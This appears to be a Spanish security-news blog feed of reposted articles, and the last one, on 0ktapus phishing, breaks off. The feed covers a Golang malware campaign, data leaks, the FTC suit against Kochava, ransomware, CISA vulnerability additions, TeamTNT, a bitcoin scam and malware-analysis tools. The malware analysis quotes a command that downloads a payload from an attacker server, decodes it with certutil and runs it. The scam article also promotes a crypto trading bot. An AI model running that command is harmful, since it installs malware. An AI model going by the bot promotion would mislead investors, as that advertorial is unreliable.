Nueva campaña de ataque aprovecha las macros de Office y las imágenes de James Webb para infectar sistemas

Introducción

El equipo de investigación de Securonix Threat identificó recientemente una muestra única de una campaña de ataque persistente basada en Golang rastreada por Securonix como GO#WEBBFUSCATOR. La nueva campaña incorpora una estrategia igualmente interesante al aprovechar la infame imagen de campo profundo tomada del telescopio James Webb de NASA y las cargas útiles ofuscadas del lenguaje de programación Golang para infectar el sistema de destino con el malware

El malware basado en Golang está en aumento y está ganando popularidad con grupos APT como Mustang Panda. Hay algunas razones por las que podemos ver que estos APT se trasladan a la plataforma Go. En primer lugar, los binarios de Go son mucho más difíciles de analizar y aplicar ingeniería inversa en comparación con los binarios compilados de C++ o C#. Go también es muy flexible cuando se trata de soporte y compilación multiplataforma. Los autores de malware pueden compilar código utilizando una base de código común para múltiples plataformas, como los sistemas operativos Windows y *NIX.

Además, existen varios marcos de malware destacados, como ColdFire y OffensiveGolang, diseñados para producir ejecutables y malware basados ​​en Go.

La infección inicial comienza con un correo electrónico de phishing que contiene un archivo adjunto de Microsoft Office (Geos-Rates.docx en nuestro caso). El documento incluye una referencia externa oculta dentro de los metadatos del documento que descarga un archivo de plantilla malicioso.

Como se ve en la imagen a continuación, el campo “Objetivo =” intenta hacerse pasar por una URL legítima de Microsoft para desplegar el archivo form.dotm.

hxxp://https://ift.tt/oecfMkN  

Una referencia externa legítima debe contener una URL modelada después de:

https://ift.tt/8JPS64t

Cuando se abre el documento, el archivo de plantilla malicioso se descarga y se guarda en el sistema. Similar a una macro de Office tradicional, el archivo de plantilla contiene un script de VB que iniciará la primera etapa de ejecución de código para este ataque una vez que el usuario habilite las macros.

El código de macro VBA malicioso está configurado para ejecutarse automáticamente una vez que se habilitan las macros. Al igual que con las macros incluidas tradicionalmente, la plantilla incluye las funciones Auto_Open, AutoOpen y AutoExec.

Después de desofuscar el código VB, nos queda el siguiente código. Podemos ver una referencia al mismo servidor C2 que aloja el archivo de plantilla de Office malicioso.

El código desofuscado ejecuta el siguiente comando que descargará un archivo llamado OxB36F8GEEC634.jpg, usará certutil.exe para decodificarlo en un binario (msdllupdate.exe) y luego, finalmente, lo ejecutará.

cmd.exe /c cd c:\users\test\appdata\local & curl hxxp://www[.]xmlschemeformat.com/update/2021/office/oxb36f8geec634.jpg -o oxb36f8geec634.jpg & certutil -decode oxb36f8geec634. jpg msdllupdate.exe y msdllupdate.exe

El archivo de imagen es bastante interesante. Se ejecuta como una imagen .jpg estándar como se ve en la imagen de abajo. Sin embargo, las cosas se ponen interesantes cuando se inspeccionan con un editor de texto.

La imagen contiene código Base64 malicioso disfrazado de certificado incluido. En el momento de la publicación, este archivo en particular no es detectado por todos los proveedores de antivirus según VirusTotal:

La carga útil codificada en Base64 se descifra y se guarda en un archivo ejecutable de Windows integrado llamado “msdllupdate.exe”, como vimos anteriormente con el comando certutil.

A continuación se muestra una captura de pantalla del código Base64 adjunto que se traduce al archivo binario msdllupdate.exe Golang.

Fuente:

El cargo Nueva campaña de ataque aprovecha las macros de Office y las imágenes de James Webb para infectar sistemas apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

Una enorme base de datos china de placas y rostros de vehículos se filtro en línea

Una cantidad masiva de datos expone nuevas vulnerabiliades en el estado de vigilancia en expansión de China

Una enorme base de datos china que almacenaba millones de rostros y matrículas de vehículos quedó expuesta en Internet durante meses antes de desaparecer silenciosamente en agosto.

Si bien su contenido puede parecer anodino para China, donde el reconocimiento facial es una rutina y la vigilancia estatal es omnipresente, el tamaño de la base de datos expuesta es asombroso. En su apogeo, la base de datos contenía más de 800 millones de registros, lo que representa uno de los mayores fallos de seguridad de datos conocidos del año por escala, después de una fuga masiva de datos de 1.000 millones de registros de una base de datos de la policía de Shanghái en junio. En ambos casos, los datos probablemente se expusieron sin darse cuenta y como resultado de un error humano.

Los datos expuestos pertenecen a una empresa de tecnología llamada Xinai Electronics con sede en Hangzhou, en la costa este de China. La empresa construye sistemas para controlar el acceso de personas y vehículos a lugares de trabajo, escuelas, obras de construcción y estacionamientos en toda China. Su sitio web promociona el uso del reconocimiento facial para una variedad de propósitos más allá del acceso al edificio, incluida la gestión de personal, como la nómina, el control de la asistencia y el rendimiento de los empleados, mientras que su sistema de reconocimiento de matrículas de vehículos basado en la nube permite a los conductores pagar el estacionamiento en garajes desatendidos que son gestionados por el personal de forma remota.

Es a través de una vasta red de cámaras que Xinai ha acumulado millones de huellas faciales y placas de matrícula, y su sitio web afirma que los datos están “almacenados de forma segura” en sus servidores.

Pero no fue así.

El investigador de seguridad Anurag Sen encontró la base de datos expuesta de la compañía en un servidor alojado en Alibaba en China y solicitó la ayuda de TechCrunch para informar el fallo de seguridad a Xinai.

Sen dijo que la base de datos contenía una cantidad alarmante de información que crecía rápidamente día a día e incluía cientos de millones de registros y direcciones web completas de archivos de imágenes alojados en varios dominios propiedad de Xinai. Pero ni la base de datos ni los archivos de imágenes alojados estaban protegidos por contraseñas y cualquiera que supiera dónde buscar podía acceder a ellos desde el navegador web.

La base de datos incluía enlaces a fotos de alta resolución de rostros, incluidos trabajadores de la construcción que ingresan a las obras y visitantes de la oficina que se registran y otra información personal, como el nombre, la edad y el sexo de la persona, tarjetas de identidad, junto con números de identificación de residentes, que son los requisitos de China a las normas nacionales. La base de datos también tenía registros de matrículas de vehículos recopilados por cámaras Xinai en estacionamientos, entradas de vehículos y otros puntos de entrada a las oficinas.

TechCrunch envió varios mensajes sobre la base de datos expuesta a direcciones de correo electrónico que se sabe que están asociadas con el fundador de Xinai, pero nuestros correos electrónicos no fueron devueltos. La base de datos ya no era accesible a mediados de agosto.

Pero Sen no es la única persona que descubrió la base de datos mientras estaba expuesta. Una nota de rescate sin fecha dejada por un extorsionador de datos afirmó haber robado el contenido de la base de datos, quien dijo que restauraría los datos a cambio de unos cientos de dólares en criptomonedas. No se sabe si el extorsionador robó o eliminó algún dato, pero la dirección de la cadena de bloques que quedó en la nota de rescate muestra que aún no ha recibido ningún dinero.

El estado de vigilancia de China se extiende profundamente en el sector privado, brindando a la policía y a las autoridades gubernamentales acceso y capacidades casi ilimitados para rastrear personas y vehículos en todo el país. China usa el reconocimiento facial para rastrear a su vasta población en ciudades inteligentes,  pero también usa la tecnología para la vigilancia masiva de las poblaciones minoritarias que Beijing ha sido acusada durante mucho tiempo de oprimir.

El año pasado, China aprobó la Ley de Protección de Información Personal , su primera ley integral de protección de datos que se considera el equivalente chino de las reglas de privacidad del RGPD de Europa, cuyo objetivo es limitar la cantidad de datos que recopilan las empresas, pero exime ampliamente a la policía y a las agencias gubernamentales que conforman el sistema de privacidad de China. vasto estado de vigilancia.

Pero ahora, con dos exposiciones masivas de datos en los últimos meses, tanto el gobierno chino como las empresas tecnológicas se encuentran mal equipados para proteger la gran cantidad de datos que recopilan sus sistemas de vigilancia.

Fuente: https://ift.tt/Eg2jNf8

El cargo Una enorme base de datos china de placas y rostros de vehículos se filtro en línea apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

LA FTC DEMANDA A UNA EMPRESA QUE VENDE DATOS DE UBICACIÓN DE USUARIOS Y RASTREA SU VISITA A CLÍNICAS DE FERTILIDAD, TEMPLOS, IGLESIAS Y OTROS LUGARES SENSIBLES

La Comisión Federal de Comercio presentó una demanda el lunes contra el corredor de datos Kochava, alegando que la empresa vendió información de geolocalización de cientos de millones de dispositivos móviles, a menudo sin el permiso del usuario, que podría revelar comportamientos sensibles de las personas, incluidas las visitas a clínicas de salud reproductiva.

“Donde los consumidores buscan atención médica, reciben asesoramiento o celebran su fe es información privada que no debe venderse al mejor postor”, dijo en un comunicado Samuel Levine, director de la Oficina de Protección al Consumidor de la FTC . “La FTC está llevando a Kochava a los tribunales para proteger la privacidad de las personas y detener la venta de su información confidencial de geolocalización”.

La demanda demuestra cómo la agencia ha respondido a una solicitud de julio de la administración Biden de usar sus autoridades para proteger la privacidad reproductiva.

Un comunicado de prensa de la FTC afirma que mediante el uso de una muestra de datos de Kochava sería posible rastrear a una persona desde una visita a una clínica reproductiva hasta su domicilio. “Los datos también pueden usarse para identificar a los profesionales médicos que realizan o ayudan en la prestación de servicios de salud reproductiva”, argumenta la agencia.

Tal argumento destruye una defensa común de muchas empresas de vigilancia comercial de que si los datos no están directamente vinculados a una persona identificada, son anónimos. La demanda de la FTC argumenta que debido a que Kochava vende datos de ubicación precisos vinculados a identificadores publicitarios, esos datos podrían combinarse con otra información, como registros de propiedad, para identificar a los usuarios exactos. La demanda cita la propia publicidad de Kochava, que sugiere que sus datos podrían usarse para “mapeo de hogares”.

La demanda también alega que Kochava solo ha tomado medidas mínimas para restringir el acceso público a estos datos. La agencia informa que hasta junio de 2022 era posible acceder con una cuenta gratuita de AWS Marketplace a los datos de 61.803.400 identificadores móviles únicos de Kochava.

La FTC está demandando para detener la venta de los datos por parte de Kochava, que según la agencia “permite que otros identifiquen a las personas y las expone a amenazas de estigma, acoso, discriminación, pérdida del trabajo e incluso violencia física”, y requiere que la empresa elimine información confidencial que ha recopilado.

Kochava presentó una demanda a principios de este mes en un tribunal de Idaho en un intento de impedir que la FTC actúe. La empresa alegó que la FTC se extralimitó en sus autoridades e hizo afirmaciones inexactas sobre cómo funciona su tecnología.

Kochava sostiene que “opera de manera constante y proactiva de conformidad con todas las reglas y leyes, incluidas las específicas de privacidad”, según una declaración proporcionada a CyberScoop por Brian Cox, gerente general de Kochava Collective.

Antes del procedimiento, Kochava anunció una nueva función que bloquearía los datos de geolocalización de ubicaciones sensibles y actualmente está en proceso de agregar la función, según Cox. Cox agregó que la compañía se había comunicado con la FTC sobre sus preocupaciones.

“Es decepcionante que la agencia siga eludiendo el proceso legislativo y perpetúe la información errónea sobre la privacidad de los datos”, dijo Cox.

La acción contra Kochava indica lo que la FTC puede tener reservado para los corredores de datos a medida que busca reglas más estrictas para la industria de la vigilancia comercial, un proceso que la agencia anunció que exploraría a principios de este mes.

“Al emprender esta acción de cumplimiento, están dejando en claro a otros actores de la industria que esta no es una práctica que se tolerará en el futuro”, dijo John Davisson, director de litigios y asesor principal de Electronic Privacy Information Center, una organización sin fines de lucro dedicada a la privacidad. .

Un caso exitoso contra Kochava podría proporcionar una base legal para la elaboración de normas que establezcan el tráfico de datos de ubicación como una práctica desleal, señala.

“La FTC está reventando la burbuja de esta idea de que puedes salirte con la tuya vendiendo datos de ubicación basados ​​en la endeble afirmación de que no están identificados”, dijo.

El cargo LA FTC DEMANDA A UNA EMPRESA QUE VENDE DATOS DE UBICACIÓN DE USUARIOS Y RASTREA SU VISITA A CLÍNICAS DE FERTILIDAD, TEMPLOS, IGLESIAS Y OTROS LUGARES SENSIBLES apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

Los distribuidores de libros más grandes del mundo, Baker & Taylor, afectados por ransomware

Baker & Taylor, uno de los distribuidores de libros más grandes del mundo, sufrió un ataque de ransomware el 23 de agosto. El incidente afectó los sistemas telefónicos, las oficinas y los centros de servicio de la empresa.

pic.twitter.com/QcFEEaALlL

— Baker and Taylor (@BakerandTaylor) August 23, 2022

El 24 de agosto, la compañía anunció que el ataque causó interrupciones en sus sistemas críticos para el negocio y que su personal técnico está trabajando para restaurar los servidores afectados.

“Gracias nuevamente por su paciencia, amables palabras y colaboración mientras nos recuperamos del ataque de ransomware de la semana pasada. Nuestro equipo ha estado trabajando las 24 horas para volver a las operaciones normales”. Baker & Taylor dijo en una actualización publicada el 29 de agosto. “Nuestra prioridad ha sido remediar nuestros sistemas y asegurarnos de que estén desinfectados. A medida que se completa ese trabajo, nuestro enfoque es hacer la transición a la restauración, poner nuestros sistemas en línea y volver a las operaciones en un enfoque por etapas. Esperamos que las interrupciones continúen esta semana, pero esperamos poder proporcionar cronogramas para sistemas y aplicaciones individuales a medida que avanza la semana. Gracias por su comprensión.”

En este momento, la compañía no reveló el nombre de la familia de ransomware que infectó sus sistemas o si los actores de amenazas robaron sus datos.

El cargo Los distribuidores de libros más grandes del mundo, Baker & Taylor, afectados por ransomware apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

Alerta de seguridad mundial emitida para miles de aviones turísticos por temor a que la tecnología de despegue y aterrizaje pueda ser hackeada

Se ha emitido una alerta de seguridad MUNDIAL para miles de aviones turísticos por temor a que la tecnología de despegue y aterrizaje pueda ser hackeada.

Se encontró un problema potencial con la herramienta de rendimiento a bordo de Boeing , una aplicación móvil que utiliza datos como el clima y el peso para que los pilotos realicen cálculos de seguridad.

El problema potencial podría permitir que los hackers engañen a los pilotos para que usen la configuración incorrecta, lo que podría causar un bloqueo al manipular los datos.

La Administración Federal de Aviación de EE. UU. emitió una alerta de seguridad a principios de este mes después de que los investigadores identificaran el problema.

Boeing dijo que no tenía conocimiento de que ningún avión se viera afectado por el problema, informa el Telegraph .

Un portavoz dijo: “Estamos comprometidos a evaluar la investigación original que se realiza y comparte de manera responsable y agradecemos a Pen Test Partners por su profesionalismo y colaboración.

“Si bien no tenemos conocimiento de ningún avión afectado por este problema, nuestro equipo lanzó una actualización de software y un boletín de servicio a nuestros clientes el año pasado para mejorar aún más la seguridad y minimizar el ya bajo riesgo de interferencia”.

Los investigadores de Pen Test Partners dijeron que una base de datos vital en la aplicación no estaba bloqueada para evitar cambios no autorizados.

El jefe Ken Munro dijo que la aplicación podría haber estado “calculando y enviando datos incorrectos” a los pilotos.

Los hackers podrían haber, por ejemplo, cambiado en secreto la longitud registrada de las pistas del aeropuerto, lo que aumenta el riesgo de que los pilotos se estrellen al despegar o aterrizar.

Se produce en medio de varios sustos de seguridad de software de aerolíneas.

El año pasado se reveló que los pilotos de Tui podrían haber estado usando la configuración incorrecta porque el software les hizo pensar que el avión era más liviano de lo que era.

Su software estaba registrando a todos los pasajeros titulados ‘Señorita’ con el peso de un niño, en lugar de un adulto, lo que significa que el programa realizó cálculos de peso incorrectos.

Tui dijo que actualizó sus sistemas después de que se informara sobre el problema.

Muchos investigadores de seguridad han argumentado que las aerolíneas podrían ser hackeadas.

Pero los expertos dicen que es imposible que los hackers tomen el control de los sistemas computarizados.

El cargo Alerta de seguridad mundial emitida para miles de aviones turísticos por temor a que la tecnología de despegue y aterrizaje pueda ser hackeada apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

Asegúrese de parchear estas 10 nuevas vulnerabilidades lo antes posible

La Agencia de Seguridad de Infraestructura y Ciberseguridad de EE. UU. (CISA) agregó el viernes 10 nuevas vulnerabilidades explotadas activamente a su Catálogo de Vulnerabilidades Explotadas Conocidas (KEV) , incluida una vulnerabilidad de seguridad de alta gravedad que afecta el software de automatización industrial de Delta Electronics.

La vulnerabilidad, rastreada como CVE-2021-38406 (puntaje CVSS: 7.8), afecta las versiones 2.00.07 y anteriores de DOPSoft 2. Una explotación exitosa de esta puede conducir a la ejecución de código arbitrario.

“Delta Electronics DOPSoft 2 carece de la validación adecuada de los datos proporcionados por el usuario al analizar archivos de proyectos específicos (validación de entrada incorrecta), lo que resulta en una escritura fuera de los límites que permite la ejecución del código”, dijo CISA en una alerta.

Vale la pena señalar que CVE-2021-38406 se divulgó originalmente como parte de un aviso de sistemas de control industrial (ICS) publicado en septiembre de 2021.

Sin embargo, no hay parches que aborden la vulnerabilidad, y CISA señala que “el producto afectado está al final de su vida útil y debe desconectarse si todavía está en uso”. Las agencias del Poder Ejecutivo Civil Federal (FCEB, por sus siglas en inglés) tienen el mandato de seguir la directriz antes del 15 de septiembre de 2022.

No hay mucha información disponible sobre la naturaleza de los ataques que explotan la vulnerabilidad de seguridad, pero un informe reciente de la Unidad 42 de Palo Alto Networks señaló instancias de ataques en estado salvaje que aprovecharon la vulnerabilidad entre febrero y abril de 2022.

El desarrollo agrega peso a la noción de que los adversarios se están volviendo más rápidos en la explotación de vulnerabilidades recién publicadas cuando se divulgan por primera vez, lo que lleva a intentos de escaneo indiscriminados y oportunistas que tienen como objetivo aprovechar la aplicación de parches retrasada.

Estos ataques a menudo siguen una secuencia específica de explotación que involucra web shells, criptomineros, botnets y troyanos de acceso remoto (RAT), seguidos de intermediarios de acceso inicial (IAB) que allanan el camino para el ransomware.

Entre otros defectos explotados activamente agregados a la lista están los siguientes:

• CVE-2022-26352 : Vulnerabilidad de carga de archivos sin restricciones de dotCMS
• CVE-2022-24706 : vulnerabilidad de inicialización predeterminada insegura de recursos de Apache CouchDB
• CVE-2022-24112 : vulnerabilidad de omisión de autenticación APISIX de Apache
• CVE-2022-22963 : Vulnerabilidad de ejecución remota de código de la función Spring Cloud de VMware Tanzu
• CVE-2022-2294 : vulnerabilidad de desbordamiento del búfer de pila de WebRTC
• CVE-2021-39226 : vulnerabilidad de omisión de autenticación de Grafana
• CVE-2020-36193 : Vulnerabilidad de resolución de enlace inadecuado de PEAR Archive_Tar
• CVE-2020-28949 – PEAR Archive_Tar Deserialización de vulnerabilidad de datos no confiables

Otra vulnerabilidad de alta gravedad agregada al Catálogo KEV es CVE-2021-31010 (puntuación CVSS: 7.5), un problema de deserialización en el componente Core Telephony de Apple que podría aprovecharse para eludir las restricciones de sandbox.

El gigante tecnológico abordó la Vulnerabilidad en iOS 12.5.5, iOS 14.8, iPadOS 14.8, macOS Big Sur 11.6 (y Security Update 2021-005 Catalina) y watchOS 7.6.2 lanzados en septiembre de 2021.

Si bien no había indicios de que se estuviera explotando la vulnerabilidad en ese momento, el gigante tecnológico parece haber revisado silenciosamente sus avisos el 25 de mayo de 2022 para agregar la vulnerabilidad y confirmar que efectivamente se había abusado de ella en los ataques.

El cargo Asegúrese de parchear estas 10 nuevas vulnerabilidades lo antes posible apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

TeamTNT: un actor de amenazas ya está atacando instancias en la nube y entornos en contenedores

El actor de amenazas conocido como TeamTNT ha estado apuntando a instancias en la nube y entornos en contenedores en sistemas de todo el mundo durante al menos dos años.

Los hallazgos provienen de los investigadores de seguridad de CloudSEK , quienes publicaron un aviso el jueves que detalla una línea de tiempo de los ataques de TeamTNT desde febrero de 2020 hasta julio de 2021.

Según el informe, el perfil de Github del grupo contiene 25 repositorios públicos, la mayoría de los cuales son bifurcaciones de herramientas populares de red teaming y otros repositorios posiblemente utilizados por ellos.

Además, el dominio detectado por CloudSEK y supuestamente asociado con TeamTNT se registró el 10 de febrero de 2020, el mismo período de tiempo en que el equipo comenzó a apuntar activamente a los servidores de Redis. 

En estas campañas iniciales, CloudSEK dijo que el objetivo de TeamTNT era el cryptojacking, ya que el grupo desplegó una serie de herramientas que normalmente se usan para estos ataques, incluidos pnscan , Tsunami y xmrigCC, entre otros.

TeamTNT luego, según se informa, comenzó a atacar las instancias de Docker en mayo de 2020, en su mayoría utilizando las mismas herramientas centradas en el criptojacking, pero introduciendo el uso del escáner masivo de puertos TCP junto con imágenes maliciosas de Alpine.

A lo largo de agosto de 2020, el grupo de ciberdelincuentes continuó sus ataques a Docker, pero comenzaron a usar las imágenes de Ubuntu directamente en lugar de Alpine. También implementaron el rootkit Linux Kernel Module (LKM) conocido como Diamorphine para ocultar sus actividades en las máquinas infectadas.

Meses después, comenzaron a explotar Weavescope para solucionar problemas y aprovecharlo como puerta trasera, y en enero de 2021, un informe de Lacework Labs sugirió que TeamTNT estaba usando tres nuevas herramientas de hacking dirigidas a Kubernetes: Peirates, Botb y libprocesshider.

Según los informes, en la segunda mitad de 2021, la lista de objetivos del grupo siguió siendo la misma, pero ampliaron sus capacidades de robo de credenciales a servicios y aplicaciones adicionales, incluidos AWS, Filezilla y GitHub, entre otros. En julio, TeamTNT lanzó una campaña llamada ‘Chimaera’, lo que sugiere que el grupo continuó con sus ataques a los servicios Docker, Kubernetes y Weavescope.

Al momento de escribir este artículo, el dominio asociado con TeamTNT ahora está fuera de línea, pero el aviso de CloudSEK sugirió que algunas capturas de pantalla del dominio todavía están disponibles en Wayback Machine.

Los investigadores de seguridad sugirieron que el grupo probablemente se originó en Alemania porque la mayoría de los tweets y guiones de bash (incluidos los comentarios) están en alemán, y la ubicación de la cuenta está establecida en ‘Deutschland’.

El cargo TeamTNT: un actor de amenazas ya está atacando instancias en la nube y entornos en contenedores apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

La estafa del sorteo de 50.000 Bitcoins por el 30º aniversario de Nvidia

Las criptomonedas representan una oportunidad muy ventajosa para los inversores que quieren ampliar su portafolio. Por otro lado, también representan una nueva herramienta para estafadores y delincuentes informáticos que se aprovechan de su popularidad.

La firma de seguridad tecnológica Kaspersky descubrió recientemente una estafa con bitcoins asociada a la empresa tecnológica Nvidia. Los delincuentes promocionaban un sorteo de 50.000 bitcoins de parte de Nvidia, como celebración por sus 30 años.

La página web utilizaba la técnica de phishing y mostraba el logo de la compañía, así como una foto de su CEO, Jensen Huang. Además del premio mayor, el sitio ofrecía doblar la cantidad de BTC que los inversionistas enviaran.

Un análisis de la dirección de bitcoin expuesta en la página muestra que se transfirieron hasta 0.42 BTC. Al precio actual de Bitcoin, esto equivale a más de 10.400 dólares. No se sabe si este dinero fue enviado por víctimas de la estafa o por los mismos delincuentes, para validar la dirección.

Aunque el sitio mencionaba la celebración de los 30 años de Nvidia, esta compañía se fundó en abril de 1993. Por lo tanto, falta más de medio año para su 30° aniversario.

¿Por qué mucha gente cae en este tipo de estafas relacionadas con las criptomonedas?

Este tipo de estafas y operaciones fraudulentas son muy comunes en el ecosistema de criptomonedas. El phishing es uno de los métodos más comunes, en el que los delincuentes se hacen pasar por compañías o individuos legítimos.

Los investigadores de Kaspersky han reseñado muchos casos de este tipo. Por ejemplo, un canal de YouTube promocionaba un falso bug en Binance que incrementaba las ganancias. Otros estafadores sustraían frases semillas de MetaMask a través de un correo electrónico fraudulento.

Este tipo de estafas son populares porque muchas personas confían en la información que reciben sin verificar su legitimidad. La oferta de ganancias exorbitantes suele ser un factor que atrae a las víctimas a enviar su dinero o información confidencial.

Aunque hay señales claras para detectar fraudes de este tipo, muchas personas no están informadas sobre esto. Los actores maliciosos también refinan sus métodos para parecer legítimos y engañar a un mayor número de personas. Al emular de forma casi exacta los sitios oficiales, muchos clientes no sospechan que sea fraudulento.

Esta no ha sido ni será la última

Otras estafas usan la imagen de personalidades influyentes en el ecosistema de criptomonedas para sustraer los fondos. Durante un tiempo, Twitter fue el escenario de centenas de cuentas falsas de Elon Musk, Vitalik Buterin y otras personalidades.

Esto incluso llevó a muchas de estas personas a indicar en su nombre de usuario que no regalaban criptomonedas. Esto como una forma de prevenir a sus seguidores sobre este tipo de estafas.

También es común la distribución de aplicaciones, generalmente carteras de criptomonedas, con códigos fraudulentos. Luego de que el usuario descarga y almacena sus activos, los atacantes sustraen los fondos.

Los virus conocidos como spyware, que espían la información que se muestra en un dispositivo, también se instalan a través de enlaces y apps. De esta forma, el atacante sustrae información confidencial que les permite acceder a las carteras de las víctimas.

Debido a la proliferación constante de este tipo de ataques, es importante tener precaución en la web. Incluso abrir un link, aunque no se descargue conscientemente una aplicación, puede ser un vector de ataque o instalaciones maliciosas.

No todo son estafas en el mundo de las criptomonedas

Sin embargo, no todo es una estafa en el criptomundo. Como mencionamos al principio, estos activos representan una oportunidad de inversión importante. Por ejemplo, los robots de trading, aunque suelen ser confundidos con virus o estafas, pueden llegar a ser una herramienta muy efectiva, aunque siempre teniendo cuidado de la cantidad que se invierte, ya que no se debe gastar mas dinero del que se tiene.

Un robot de trading no es más que un software que permite la ejecución automatizada de operaciones de compra y venta de criptomonedas. Su ventaja es que, al basarse en algoritmos, suele ser más ágil y tener un criterio más agudo que una persona.

Su uso está muy extendido en distintos países, por lo que cada vez se vuelven más populares entre aquellas personas que buscan obtener rendimientos significativos. 

Lo primero y más  importante es verificar la fiabilidad del robot que se elija a través de distintas fuentes. Siempre ir a lo seguro y utilizar bots de trading de desarrolladores confiables.

Bitcoin Billionaire es una excelente opción para todo tipo de usuarios, pues no requiere ningún conocimiento previo para utilizarlo. Su depósito mínimo es de apenas 250$, por lo que la barrera de entrada no es elevada. Además, en las operaciones de retiro y compraventa no se cargan comisiones al cliente.

El proceso de registro es relativamente largo, pero esto es necesario para verificar la identidad de los usuarios. Sus únicas desventajas son la falta de aplicación móvil y la poca oferta de criptomonedas. Por ahora, Bitcoin Billionaire solo opera con BTC, ETH, XRP, BAT y LTC.

Si deseas saber más sobre este robot de trading de criptomonedas, puedes leer la siguiente guía sobre y opiniones sobre Bitcoin Billionaire.

¿Como evitar las estafas relacionadas con las criptomonedas?

Para evitar caer en estafas de cualquier tipo hay que verificar cada correo que recibimos y cada sitio web al que ingresamos. En el caso de los correos electrónicos, es importante comprobar que la dirección del remitente sea de la compañía e incluya el nombre luego de la arroba.

Si el email incluye un enlace o un botón, se puede acercar el cursor sin hacer clic, para ver la URL a la que redirige. En el caso de estar en una página web, hay que revisar la dirección y los certificados de seguridad y ser cautelosos al ingresar datos personales.

Si el sitio ofrece un premio o recompensa, como sucedió con Nvidia, hay que investigar en motores de búsqueda si es legítimo, ingresando a la web oficial.

El cargo La estafa del sorteo de 50.000 Bitcoins por el 30º aniversario de Nvidia apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

Mejores herramientas de análisis de malware de código abierto que deberías usar para ingeniería inversa de un ransomware

Hay dos tipos principales de análisis de malware: estático y dinámico.

Realizar un análisis estático de un binario malicioso significa concentrarse en analizar su código sin ejecutarlo. Este tipo de análisis puede revelar a los analistas de malware no solo lo que hace el malware, sino también las intenciones futuras de su desarrollador (p. ej., funcionalidades actualmente sin terminar).

El análisis dinámico analiza el comportamiento del malware cuando se ejecuta, generalmente en un entorno limitado virtual. Este tipo de análisis debería revelar el comportamiento del malware y cualquier técnica de evasión de detección que utilice.

El análisis de malware beneficia a los analistas de seguridad al permitirles, entre otras cosas:

• Identificar indicadores ocultos de compromiso (IOC).
• Aumente la eficacia de las notificaciones y advertencias del COI.
• Clasifica los incidentes según su gravedad.

Todas las herramientas de análisis de malware que se enumeran a continuación se pueden descargar y utilizar de forma gratuita.

capa: identifica automáticamente las capacidades de malware

capa detecta capacidades en archivos ejecutables. Lo ejecuta contra un módulo PE, ELF, .NET o un archivo de shellcode y le dice lo que cree que puede hacer el programa. Por ejemplo, podría sugerir que el archivo es una puerta trasera, es capaz de instalar servicios o depende de HTTP para comunicarse.

Solucionador de cadenas ofuscadas FLARE

FLARE Ofuscated String Solver ( FLOSS ) utiliza técnicas avanzadas de análisis estático para desofuscar automáticamente cadenas de archivos binarios de malware. Puede usarlo como strings.exe para mejorar el análisis estático básico de archivos binarios desconocidos.

Marco de ingeniería inversa de Ghidra Software

Ghidra es un marco de ingeniería inversa de software (SRE) creado y mantenido por la Dirección de Investigación de la Agencia de Seguridad Nacional. Este marco incluye un conjunto de herramientas de análisis de software de alto nivel y con todas las funciones que permiten a los usuarios analizar el código compilado en una variedad de plataformas, incluidas Windows, macOS y Linux. Las capacidades incluyen desensamblaje, ensamblaje, descompilación, creación de gráficos y secuencias de comandos, junto con cientos de otras características.

Malcom: Analizador de comunicación de malware

Malcom es una herramienta diseñada para analizar la comunicación de red de un sistema mediante representaciones gráficas del tráfico de red y compararlas con fuentes de malware conocidas. Esto resulta útil cuando se analiza cómo ciertas especies de malware intentan comunicarse con el mundo exterior.

Marco de seguridad móvil (MobSF)

MobSF es una aplicación móvil todo en uno automatizada (Android/iOS/Windows) para pruebas de penetración, análisis de malware y marco de evaluación de seguridad capaz de realizar análisis estáticos y dinámicos. MobSF admite binarios de aplicaciones móviles (APK, XAPK, IPA y APPX) junto con el código fuente comprimido y proporciona API REST para una integración perfecta con su canalización de CI/CD o DevSecOps. Dynamic Analyzer lo ayuda a realizar evaluaciones de seguridad en tiempo de ejecución y pruebas instrumentadas interactivas.

Pafish: herramienta de prueba

Pafish es una herramienta de prueba que utiliza diferentes técnicas para detectar máquinas virtuales y entornos de análisis de malware de la misma manera que lo hacen las familias de malware. El proyecto es gratuito y de código abierto; el código de todas las técnicas de antianálisis está disponible públicamente.

Radare2: el marco de ingeniería inversa similar a Libre Unix

El proyecto radare comenzó como un simple editor hexadecimal de línea de comandos centrado en análisis forense. Hoy en día, Radare2 es una herramienta de línea de comandos de bajo nivel con soporte para secuencias de comandos. Puede editar archivos en discos duros locales, ver la memoria del kernel y depurar programas localmente o mediante un servidor gdb remoto. El amplio soporte de arquitectura de Radare2 le permite analizar, emular, depurar, modificar y desensamblar cualquier binario.

theZoo: Un repositorio de malware en vivo

theZoo es un repositorio de malware vivo. El proyecto se creó para ofrecer una forma rápida y fácil de recuperar muestras de malware y código fuente de manera organizada con la esperanza de promover la investigación de malware.

El cargo Mejores herramientas de análisis de malware de código abierto que deberías usar para ingeniería inversa de un ransomware apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

Nueva campaña de phishing 0ktapus apunta a las credenciales de identidad de Okta y así funciona

Los investigadores de seguridad han revelado una nueva campaña de phishing dirigida a las credenciales de identidad de Okta y los códigos de autenticación de dos factores (2FA) conectados. 

El análisis proviene del Group-IB , quien dijo que era particularmente interesante porque, a pesar de usar métodos poco calificados, la campaña pudo comprometer a una gran cantidad de empresas conocidas.

De hecho, los atacantes enviaron a los empleados de las empresas objetivo mensajes de texto que contenían enlaces a sitios de phishing que imitaban la página de autenticación de Okta de su organización, seguidos de un segundo mensaje solicitando un código 2FA. Al intentar iniciar sesión, las credenciales de su víctima se enviarían a los actores maliciosos detrás del ataque.

“Además, una vez que los atacantes comprometieron a una organización, pudieron girar rápidamente y lanzar ataques posteriores a la cadena de suministro, lo que indica que el ataque se planeó cuidadosamente con anticipación”, escribió Group-IB en un aviso publicado hoy, 25 de agosto de 2022.

